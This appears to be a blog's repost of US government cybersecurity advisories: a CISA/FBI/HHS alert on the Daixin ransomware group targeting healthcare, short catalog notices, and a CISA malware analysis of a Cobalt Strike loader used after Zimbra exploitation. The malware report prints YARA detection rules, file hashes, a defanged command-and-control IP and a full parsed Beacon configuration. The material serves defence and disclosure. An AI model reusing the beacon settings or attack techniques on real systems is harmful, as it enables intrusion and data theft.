#StopRansomware: Daixin Team

#StopRansomware: Daixin Team

by | Oct 21, 2022 | Security, Technology

This article is contributed. See the original author and article here.

Summary

Actions to take today to mitigate cyber threats from ransomware:

• Install updates for operating systems, software, and firmware as soon as they are released.
• Require phishing-resistant MFA for as many services as possible.
• Train users to recognize and report phishing attempts.

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Health and Human Services (HHS) are releasing this joint CSA to provide information on the “Daixin Team,” a cybercrime group that is actively targeting U.S. businesses, predominantly in the Healthcare and Public Health (HPH) Sector, with ransomware and data extortion operations.

This joint CSA provides TTPs and IOCs of Daixin actors obtained from FBI threat response activities and third-party reporting.

Download the PDF version of this report: pdf, 591 KB

Technical Details

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 11. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

Cybercrime actors routinely target HPH Sector organizations with ransomware:

  • As of October 2022, per FBI Internet Crime Complaint Center (IC3) data, specifically victim reports across all 16 critical infrastructure sectors, the HPH Sector accounts for 25 percent of ransomware complaints.
  • According to an IC3 annual report in 2021, 649 ransomware reports were made across 14 critical infrastructure sectors; the HPH Sector accounted for the most reports at 148.

The Daixin Team is a ransomware and data extortion group that has targeted the HPH Sector with ransomware and data extortion operations since at least June 2022. Since then, Daixin Team cybercrime actors have caused ransomware incidents at multiple HPH Sector organizations where they have:

  • Deployed ransomware to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services, and/or
  • Exfiltrated personal identifiable information (PII) and patient health information (PHI) and threatened to release the information if a ransom is not paid.

Daixin actors gain initial access to victims through virtual private network (VPN) servers. In one confirmed compromise, the actors likely exploited an unpatched vulnerability in the organization’s VPN server [T1190]. In another confirmed compromise, the actors used previously compromised credentials to access a legacy VPN server [T1078] that did not have multifactor authentication (MFA) enabled. The actors are believed to have acquired the VPN credentials through the use of a phishing email with a malicious attachment [T1598.002].

After obtaining access to the victim’s VPN server, Daixin actors move laterally via Secure Shell (SSH) [T1563.001] and Remote Desktop Protocol (RDP) [T1563.002]. Daixin actors have sought to gain privileged account access through credential dumping [T1003] and pass the hash [T1550.002]. The actors have leveraged privileged accounts to gain access to VMware vCenter Server and reset account passwords [T1098] for ESXi servers in the environment. The actors have then used SSH to connect to accessible ESXi servers and deploy ransomware [T1486] on those servers. 

According to third-party reporting, the Daixin Team’s ransomware is based on leaked Babuk Locker source code. This third-party reporting as well as FBI analysis show that the ransomware targets ESXi servers and encrypts files located in /vmfs/volumes/ with the following extensions: .vmdk, .vmem, .vswp, .vmsd, .vmx, and .vmsn. A ransom note is also written to /vmfs/volumes/. See Figure 1 for targeted file system path and Figure 2 for targeted file extensions list. Figure 3 and Figure 4 include examples of ransom notes. Note that in the Figure 3 ransom note, Daixin actors misspell “Daixin” as “Daxin.”

Figure 1: Daixin Team – Ransomware Targeted File Path

Figure 2: Daixin Team – Ransomware Targeted File Extensions

Figure 3: Example 1 of Daixin Team Ransomware Note

Figure 4: Example 2 of Daixin Team Ransomware Note

In addition to deploying ransomware, Daixin actors have exfiltrated data [TA0010] from victim systems. In one confirmed compromise, the actors used Rclone—an open-source program to manage files on cloud storage—to exfiltrate data to a dedicated virtual private server (VPS). In another compromise, the actors used Ngrok—a reverse proxy tool for proxying an internal service out onto an Ngrok domain—for data exfiltration [T1567].

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 1 for all referenced threat actor tactics and techniques included in this advisory.

Table 1: Daixin Actors’ ATT&CK Techniques for Enterprise

Reconnaissance

Technique Title

ID

Use

Phishing for Information: Spearphishing Attachment

T1598.002

Daixin actors have acquired the VPN credentials (later used for initial access) by a phishing email with a malicious attachment.

Initial Access

Technique Title

ID

Use

Exploit Public-Facing Application

T1190

Daixin actors exploited an unpatched vulnerability in a VPN server to gain initial access to a network.

Valid Accounts

T1078

Daixin actors use previously compromised credentials to access servers on the target network.

Persistence

Technique Title

ID

Use

Account Manipulation

T1098

Daixin actors have leveraged privileged accounts to reset account passwords for VMware ESXi servers in the compromised environment.

Credential Access

Technique Title

ID

Use

OS Credential Dumping

T1003

Daixin actors have sought to gain privileged account access through credential dumping.

Lateral Movement

Technique Title

ID

Use

Remote Service Session Hijacking: SSH Hijacking

T1563.001

Daixin actors use SSH and RDP to move laterally across a network.

Remote Service Session Hijacking: RDP Hijacking

T1563.002

Daixin actors use RDP to move laterally across a network.

Use Alternate Authentication Material: Pass the Hash

T1550.002

Daixin actors have sought to gain privileged account access through pass the hash.

Exfiltration

Technique Title

ID

Use

Exfiltration Over Web Service

T1567

Daixin Team members have used Ngrok for data exfiltration over web servers.

Impact

Technique Title

ID

Use

Data Encrypted for Impact

T1486

Daixin actors have encrypted data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.

INDICATORS OF COMPROMISE

See Table 2 for IOCs obtained from third-party reporting.

Table 2: Daixin Team IOCs – Rclone Associated SHA256 Hashes

File

SHA256

rclone-v1.59.2-windows-amd64git-log.txt

9E42E07073E03BDEA4CD978D9E7B44A9574972818593306BE1F3DCFDEE722238

rclone-v1.59.2-windows-amd64rclone.1

19ED36F063221E161D740651E6578D50E0D3CACEE89D27A6EBED4AB4272585BD

rclone-v1.59.2-windows-amd64rclone.exe

54E3B5A2521A84741DC15810E6FED9D739EB8083CB1FE097CB98B345AF24E939

rclone-v1.59.2-windows-amd64README.html

EC16E2DE3A55772F5DFAC8BF8F5A365600FAD40A244A574CBAB987515AA40CBF

rclone-v1.59.2-windows-amd64README.txt

475D6E80CF4EF70926A65DF5551F59E35B71A0E92F0FE4DD28559A9DEBA60C28

Mitigations

FBI, CISA, and HHS urge HPH Sector organizations to implement the following to protect against Daixin and related malicious activity:

  • Install updates for operating systems, software, and firmware as soon as they are released. Prioritize patching VPN servers, remote access software, virtual machine software, and known exploited vulnerabilities. Consider leveraging a centralized patch management system to automate and expedite the process.
  • Require phishing-resistant MFA for as many services as possible—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.
  • If you use Remote Desktop Protocol (RDP), secure and monitor it.
    • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources, and require multifactor authentication (MFA) to mitigate credential theft and reuse. If RDP must be available externally, use a virtual private network (VPN), virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.
    • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for business purposes (e.g., RDP Transmission Control Protocol Port 3389).
  • Turn off SSH and other network device management interfaces such as Telnet, Winbox, and HTTP for wide area networks (WANs) and secure with strong passwords and encryption when enabled.
  • Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer.
  • Limit access to data by deploying public key infrastructure and digital certificates to authenticate connections with the network, Internet of Things (IoT) medical devices, and the electronic health record system, as well as to ensure data packages are not manipulated while in transit from man-in-the-middle attacks.
  • Use standard user accounts on internal systems instead of administrative accounts, which allow for overarching administrative system privileges and do not ensure least privilege.
  • Secure PII/PHI at collection points and encrypt the data at rest and in transit by using technologies such as Transport Layer Security (TPS). Only store personal patient data on internal systems that are protected by firewalls, and ensure extensive backups are available if data is ever compromised.
  • Protect stored data by masking the permanent account number (PAN) when it is displayed and rendering it unreadable when it is stored—through cryptography, for example.
  • Secure the collection, storage, and processing practices for PII and PHI, per regulations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Implementing HIPAA security measures can prevent the introduction of malware on the system.
  • Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise.
  • Create and regularly review internal policies that regulate the collection, storage, access, and monitoring of PII/PHI.
  • In addition, the FBI, CISA, and HHS urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.

Preparing for Ransomware

  • Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware incident and protect against data losses.
    • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
  • Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response procedures for a ransomware incident.
    • Organizations should also ensure their incident response and communications plans include response and notification procedures for data breach incidents. Ensure the notification procedures adhere to applicable state laws.
      • Refer to applicable state data breach laws and consult legal counsel when necessary.
      • For breaches involving electronic health information, you may need to notify the Federal Trade Commission (FTC) or the Department of Health and Human Services, and—in some cases—the media. Refer to the FTC’s Health Breach Notification Rule and U.S. Department of Health and Human Services’ Breach Notification Rule for more information.
    • See CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide and CISA Fact Sheet, Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches, for information on creating a ransomware response checklist and planning and responding to ransomware-caused data breaches.

Mitigating and Preventing Ransomware

  • Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
  • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
  • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs.
  • Open document readers in protected viewing modes to help prevent active content from running.
  • Implement user training program and phishing exercises to raise awareness among users about the risks of visiting suspicious websites, clicking on suspicious links, and opening suspicious attachments. Reinforce the appropriate user response to phishing and spearphishing emails.
  • Use strong passwords and avoid reusing passwords for multiple accounts. See CISA Tip Choosing and Protecting Passwords and the National Institute of Standards and Technology’s (NIST’s) Special Publication 800-63B: Digital Identity Guidelines for more information.
  • Require administrator credentials to install software.
  • Audit user accounts with administrative or elevated privileges and configure access controls with least privilege in mind.
  • Install and regularly update antivirus and antimalware software on all hosts.
  • Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.
  • Consider adding an email banner to messages coming from outside your organizations.
  • Disable hyperlinks in received emails.

Responding to Ransomware Incidents

If a ransomware incident occurs at your organization:

  • Follow your organization’s Ransomware Response Checklist (see Preparing for Ransomware section).
  • Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.
  • Follow the notification requirements as outlined in your cyber incident response plan.
  • Report incidents to the FBI at a local FBI Field Office, CISA at cisa.gov/report, or the U.S. Secret Service (USSS) at a USSS Field Office.
  • Apply incident response best practices found in the joint Cybersecurity Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

Note: FBI, CISA, and HHS strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.

REFERENCES

  • Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
  • Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
  • No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.
  • Ongoing Threat Alerts and Sector alerts are produced by the Health Sector Cybersecurity Coordination Center (HC3) and can be found at hhs.gov/HC3
  • For additional best practices for Healthcare cybersecurity issues see the HHS 405(d) Aligning Health Care Industry Security Approaches at 405d.hhs.gov 

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Daixin Group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Regardless of whether you or your organization have decided to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at cisa.gov/report.

ACKNOWLEDGEMENTS

FBI, CISA, and HHS would like to thank CrowdStrike and the Health Information Sharing and Analysis Center (Health-ISAC) for their contributions to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.

Revisions

Initial Publication: October 21, 2022

This product is provided subject to this Notification and this Privacy & Use policy.

CISA Adds Two Known Exploited Vulnerabilities to Catalog   

by | Oct 20, 2022 | Security, Technology

This article is contributed. See the original author and article here.

CISA has added two vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow in the “Date Added to Catalog” column, which will sort by descending dates.      

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.   

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the specified criteria.

CISA Releases Three Industrial Control Systems Advisories

CISA Releases Three Industrial Control Systems Advisories

by | Oct 20, 2022 | Security, Technology

This article is contributed. See the original author and article here.

Dot gov

Official websites use .gov
A .gov website belongs to an official government organization in the United States.

SSL

Secure .gov websites use HTTPS

A lock (lock icon) or https:// means you’ve safely connected to the .gov website. Share sensitive information only on official, secure websites.
10398871-1.v2 Zimbra October Update

10398871-1.v2 Zimbra October Update

by | Oct 19, 2022 | Security, Technology

This article is contributed. See the original author and article here.

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Description

CISA received a benign 32-bit Windows executable file, a malicious dynamic-link library (DLL) and an encrypted file for analysis from an organization where cyber actors exploited vulnerabilities against Zimbra Collaboration Suite (ZCS). Four CVEs are currently being leveraged against ZCS: CVE-2022-24682, CVE-2022-27924, CVE-2022-27925 chained with CVE-2022-37042, and CVE-2022-30333. The executable file is designed to side-load the malicious DLL file. The DLL is designed to load and Exclusive OR (XOR) decrypt the encrypted file. The decrypted file contains a Cobalt Strike Beacon binary. The Cobalt Strike Beacon is a malicious implant on a compromised system that calls back to the command and control (C2) server and checks for additional commands to execute on the compromised system.

For more information on cyber actors exploiting vulnerabilities in ZCS, see joint CSA: Threat Actors Exploiting Multiple CVEs Against Zimbra Collaboration Suite.

Download the PDF version of this report: MAR-10398871-1.v2.WHITE, 372 kb

Submitted Files (3)

233bb85dbeba69231533408501697695a66b7790e751925231d64bddf80bbf91 (bin.config)

25da610be6acecfd71bbe3a4e88c09f31ad07bdd252eb30feeef9debd9667c51 (VFTRACE.dll)

df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348 (vxhost.exe)

Additional Files (1)

3450d5a3c51711ae4a2bdb64a896d312ba638560aa00adb2fc1ebc34bee9369e (Extracted_CobaltStrike_Beacon)

IPs (1)

207.148.76.235

df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348

Tags

loaderpup

Details
Name vxhost.exe
Size 351240 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 4109ac08bdc8591c7b46348eb1bca85d
SHA1 6423d1c324522bfd2b65108b554847ac4ab02479
SHA256 df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348
SHA512 0605362190a9cb04a7392c7eae3ef79964a76ea68dc03dfabe6ec8f445f1c355772f2ca8166cbee73188e57bff06b74fb2cfa59869cb4461fffe1c3589856554
ssdeep 6144:BTMoU0+zvvLIpa8bo5GOc1G41vupWn2rwRGekPHZLZKA1UnmOlm:XUDvvsc80AOc1GYvAW2EGtH5ZKAKmOQ
Entropy 6.471736
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2016-01-05 08:22:40-05:00
Import Hash b66afb12e84aa5ce621a6635837cadba
Company Name CyberArk Software Ltd.
File Description CyberArk Viewfinity
Internal Name vf_host.exe
Legal Copyright Copyright © 1999-2016 CyberArk Software Ltd. All Rights Reserved.
Original Filename vf_host.exe
Product Name CyberArk Viewfinity
Product Version 5.5.10.101
PE Sections
MD5 Name Raw Size Entropy
3822119e846581669481aba79308c57c header 1024 2.580725
98ccfff2af4ccaa3335f63592a1fba02 .text 270848 6.543317
9dcc89a0d16e36145bb07924ca260dfe .rdata 50688 5.132125
14d493033fc147f67601753310725b2b .data 5632 3.711689
615729d1383743a91b8baf309f1a8232 .rsrc 16896 4.839559
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
df847abbfa… Used 25da610be6acecfd71bbe3a4e88c09f31ad07bdd252eb30feeef9debd9667c51
Description

This artifact is a 32-bit executable file that has been identified as a version of vf_host.exe from Viewfinity and is benign. The file is used to side-load a DLL, vftrace.dll “058434852bb8e877069d27f452442167”.

25da610be6acecfd71bbe3a4e88c09f31ad07bdd252eb30feeef9debd9667c51

Tags

loadertrojan

Details
Name VFTRACE.dll
Size 78336 bytes
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 058434852bb8e877069d27f452442167
SHA1 026d81090c857d894aaa18225ec4a99e419da651
SHA256 25da610be6acecfd71bbe3a4e88c09f31ad07bdd252eb30feeef9debd9667c51
SHA512 602ad76d61e97d72d983083768eba32d3ad549ac1c763a9b39092feaef8bd4d186df18b6f91992ac8da517e86b84aaa2422da700798a65f4383ed997f52744e3
ssdeep 1536:carhs4oc7yABoxjo5p+Ocyk7P0Okmu4dJsWxcdbbZFUZAUZpw/:ndy8oxjS+Ocyk7sMzCbVFUZAULW
Entropy 6.278601
Antivirus
Adaware Gen:Variant.Bulz.429221
Avira TR/Agent.bjbhb
Bitdefender Gen:Variant.Bulz.429221
Cyren W32/ABRisk.LHKD-1052
ESET a variant of Win32/Agent.AELW trojan
Emsisoft Gen:Variant.Bulz.429221 (B)
IKARUS Trojan.Win32.Agent
K7 Trojan ( 00595a621 )
Symantec Trojan.Gen.MBT
Zillya! Trojan.Agent.Win32.2882847
YARA Rules
  • rule CISA_10398871_01 : trojan loader COBALTSTRIKE
    {
       meta:
           Author = “CISA Code & Media Analysis”
           Incident = “10398871”
           Date = “2022-09-29”
           Last_Modified = “20221001_1200”
           Actor = “n/a”
           Category = “Trojan Loader”
           Family = “COBALTSTRIKE”
           Description = “Detects CobaltStrike Loader samples”
           MD5=”058434852bb8e877069d27f452442167″
           SHA256=”25da610be6acecfd71bbe3a4e88c09f31ad07bdd252eb30feeef9debd9667c51″
       strings:
           $s1 = { 62 69 6E 2E 63 6F 6E 66 69 67 }
           $s2 = { 56 46 54 52 41 43 45 }
           $s3 = { FF 15 18 D0 00 10 }
           $s4 = { FF 15 28 D0 00 10 }
           $s5 = { 8B 55 EC 03 55 F4 0F B6 02 33 45 E4 }
       condition:
           uint16(0) == 0x5A4D and all of them
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2022-06-20 05:36:32-04:00
Import Hash 6677de6818bcf597d512ad4ddaea3f53
Company Name CyberArk Software Ltd.
File Description CyberArk Viewfinity
Internal Name VFTRACE.dll
Legal Copyright Copyright © 1999-2016 CyberArk Software Ltd. All Rights Reserved.
Original Filename VFTRACE.dll
Product Name CyberArk Viewfinity
Product Version 5.5.10.101
PE Sections
MD5 Name Raw Size Entropy
ef4a8b161c3676b052755f8c0bf9f3bd header 1024 2.828221
48afd9b4ef10b5f14b2c10c9581cbc2d .text 45568 6.611882
f99c54571592839d48904df07f921829 .rdata 24064 4.990721
8a5c1764d3d68e0963003dd46f3b905e .data 2560 1.834913
1e0c952d3a72e7edcda3b58acd829b6b .rsrc 1536 3.799739
41dfd851e9053a3876aa86212cd5d4a1 .reloc 3584 6.485745
Packers/Compilers/Cryptors
Borland Delphi 3.0 (???)
Relationships
25da610be6… Used_By df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348
25da610be6… Used 233bb85dbeba69231533408501697695a66b7790e751925231d64bddf80bbf91
Description

This artifact is a malicious 32-bit DLL file loaded by “vxhost.exe” (4109ac08bdc8591c7b46348eb1bca85d). This file is designed to search and load an encrypted file “%current directory%bin.config” (be2b0c387642fe7e8475f5f5f0c6b90a) if installed on the compromised system. It decrypts the file using the hard-coded XOR key “0x401”. The decrypted binary contains a Cobalt Strike Beacon DLL that has an embedded shellcode inside of the MZ header. It copies the Cobalt Strike Beacon DLL into a buffer and executes the shellcode.

Screenshots

Figure 1 - This screenshot illustrates code extracted from this malware where it loads and XOR decrypts the encrypted file "bin.config" (be2b0c387642fe7e8475f5f5f0c6b90a) before executed in memory.

Figure 1 – This screenshot illustrates code extracted from this malware where it loads and XOR decrypts the encrypted file “bin.config” (be2b0c387642fe7e8475f5f5f0c6b90a) before executed in memory.

3450d5a3c51711ae4a2bdb64a896d312ba638560aa00adb2fc1ebc34bee9369e

Tags

trojan

Details
Name Extracted_CobaltStrike_Beacon
Size 210953 bytes
Type data
MD5 ff1d9474c2bfa9ada8d5ed3e16f0b04a
SHA1 60299a59f05b10f49f781dc073249bcb7ec27b63
SHA256 3450d5a3c51711ae4a2bdb64a896d312ba638560aa00adb2fc1ebc34bee9369e
SHA512 a064097eb149f7a23df75d7575f8c30ffb83fd7ad0a00ab379c34c114827cef5ec574a1126a7f914eeed08a8c8230c796cdc5cdf111cc238fa6e9427580f9fab
ssdeep 6144:tRqu98CxD0cdRScc6stsxB4WLks1YarGR8Wjo/gj:F24hdEjWLks1YarGR85Yj
Entropy 6.968463
Antivirus
Adaware DeepScan:Generic.Exploit.Shellcode.2.8AF0A507
Bitdefender DeepScan:Generic.Exploit.Shellcode.2.8AF0A507
Emsisoft DeepScan:Generic.Exploit.Shellcode.2.8AF0A507 (B)
Trend Micro Trojan.FC904969
Trend Micro HouseCall Trojan.FC904969
YARA Rules
  • rule CISA_10398871_02 : trojan COBALTSTRIKE
    {
       meta:
           Author = “CISA Code & Media Analysis”
           Incident = “10398871”
           Date = “2022-09-29”
           Last_Modified = “20221001_1200”
           Actor = “n/a”
           Category = “Trojan”
           Family = “COBALTSTRIKE”
           Description = “Detects CobaltStrike trojan shellcode samples with an embedded beacon”
           MD5=”ff1d9474c2bfa9ada8d5ed3e16f0b04a”
           SHA256=”3450d5a3c51711ae4a2bdb64a896d312ba638560aa00adb2fc1ebc34bee9369e”
       strings:
           $s1 = { 41 41 41 41 }
           $s2 = { 42 42 42 42 }
           $s3 = { 0F B6 45 10 8B 4D 08 03 4D FC 0F BE 11 33 D0 }
           $s4 = { 8B 4D 08 51 6A 01 8B 55 C0 52 FF 55 C8 }
       condition:
           uint16(9) == 0x5A4D and all of them
    }
ssdeep Matches

No matches found.

Relationships
3450d5a3c5… Connected_To 207.148.76.235
3450d5a3c5… Contained_Within 233bb85dbeba69231533408501697695a66b7790e751925231d64bddf80bbf91
Description

This file is decrypted and executed by “vftrace.dll” (058434852bb8e877069d27f452442167). This file is a 32-bit Portable Executable (PE) DLL that has an embedded shellcode inside of the MZ header, which is located at the start of the file. When executed, the shellcode decrypts an embedded beacon payload using a single-byte XOR key 0xC3. It executes the entry point of the decrypted payload in memory at runtime. The decrypted payload has been identified as a Cobalt Strike Beacon implant. During the execution, it decodes its configuration using a single-byte XOR key 0x4f. The configuration contains the, RSA public key, C2, communication protocol, and more. The parsed configuration data for the Cobalt Strike Beacon implant is displayed below in JSON format:

–Begin configuration in the Cobalt Strike Beacon–
{
“BeaconType”: [
   “HTTPS”                         ==> Beacon uses HTTPS to communicate
],
“Port”: 443,
“SleepTime”: 5000,                ==> Timing of C2 Beacons via Sleeptime and Jitter feature
“MaxGetSize”: 1403644,
“Jitter”: 20,                         ==> . Jitter value to force Beacon to randomly modify its sleep time. Jitter of 20 means that there is a random jitter of 20% of 5000 milliseconds
“MaxDNS”: “Not Found”,     ==> Publickey to encrypt communications
“PublicKey”:                     “MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDApWEZn8vYHYN/JiXoF72xGpWuxdZ7gGRYn6E7+mFmsVDSzImL7GTMXrllB4TM6/oR+WDKk0L+8elLel63FXPQ3d3K/t1/8dnYBLpjPER+/G/iu2viAN+6KEsQfKA3O6ZvABg9/uH86G2erow7Ik4a2VinucYSkKJ8jYV1yfeDzQIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==”,
“PublicKey_MD5”: “9b96180552065cdf6cc42f8ba6f43f8b”,
“C2Server”: “207[.]148[.]76[.]235,/jquery-3.3.1.min.js”,
“UserAgent”: “Mozilla/4.1 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36”,
“HttpPostUri”: “/jquery-3.3.2.min.js”,
“Malleable_C2_Instructions”: [
   “Remove 1522 bytes from the end”,
   “Remove 84 bytes from the beginning”,
   “Remove 3931 bytes from the beginning”,
   “Base64 URL-safe decode”,
   “XOR mask w/ random key”
],
“HttpGet_Metadata”: {
   “ConstHeaders”: [
    “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”,
    “Referer: http://code.jquery.com/”,
    “Accept-Encoding: gzip, deflate”
   ],
   “ConstParams”: [],
   “Metadata”: [
    “base64url”,
    “prepend “__cfduid=””,
    “header “Cookie””
   ],
   “SessionId”: [],
   “Output”: []
},
“HttpPost_Metadata”: {
   “ConstHeaders”: [
    “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”,
    “Referer: http://code.jquery.com/”,
    “Accept-Encoding: gzip, deflate”
   ],
   “ConstParams”: [],
   “Metadata”: [],
   “SessionId”: [
    “mask”,
    “base64url”,
    “parameter “__cfduid””
   ],
   “Output”: [
    “mask”,
    “base64url”,
    “print”
   ]
},
“SpawnTo”: “AAAAAAAAAAAAAAAAAAAAAA==”,
“PipeName”: “Not Found”,
“DNS_Idle”: “Not Found”,
“DNS_Sleep”: “Not Found”,
“SSH_Host”: “Not Found”,
“SSH_Port”: “Not Found”,
“SSH_Username”: “Not Found”,
“SSH_Password_Plaintext”: “Not Found”,
“SSH_Password_Pubkey”: “Not Found”,
“SSH_Banner”: “”,
“HttpGet_Verb”: “GET”,
“HttpPost_Verb”: “POST”,
“HttpPostChunk”: 0,
“Spawnto_x86”: “%windir%syswow64dllhost.exe”,
“Spawnto_x64”: “%windir%sysnativedllhost.exe”,
“CryptoScheme”: 0,
“Proxy_Config”: “Not Found”,
“Proxy_User”: “Not Found”,
“Proxy_Password”: “Not Found”,
“Proxy_Behavior”: “Use IE settings”,
“Watermark”: 1234567890,
“bStageCleanup”: “True”,
“bCFGCaution”: “False”,
“KillDate”: 0,
“bProcInject_StartRWX”: “False”,
“bProcInject_UseRWX”: “False”,
“bProcInject_MinAllocSize”: 17500,
“ProcInject_PrependAppend_x86”: [
   “kJA=”,
   “Empty”
],
“ProcInject_PrependAppend_x64”: [
   “kJA=”,
   “Empty”
],
“ProcInject_Execute”: [
   “ntdll:RtlUserThreadStart”,
   “CreateThread”,
   “NtQueueApcThread-s”,
   “CreateRemoteThread”,
   “RtlCreateUserThread”
],
“ProcInject_AllocationMethod”: “NtMapViewOfSection”,
“ProcInject_Stub”: “s7YR+gVAMtA1Jtjf0KV/Cw==”,     ==> the Base64 encoded MD5 file hash of the Cobalt Strike
“bUsesCookies”: “True”,
“HostHeader”: “”,
“smbFrameHeader”: “AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=”,
“tcpFrameHeader”: “AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=”,
“headersToRemove”: “Not Found”,
“DNS_Beaconing”: “Not Found”,
“DNS_get_TypeA”: “Not Found”,
“DNS_get_TypeAAAA”: “Not Found”,
“DNS_get_TypeTXT”: “Not Found”,
“DNS_put_metadata”: “Not Found”,
“DNS_put_output”: “Not Found”,
“DNS_resolver”: “Not Found”,
“DNS_strategy”: “round-robin”,
“DNS_strategy_rotate_seconds”: -1,
“DNS_strategy_fail_x”: -1,
“DNS_strategy_fail_seconds”: -1
}
–End configuration in the Cobalt Strike Beacon–

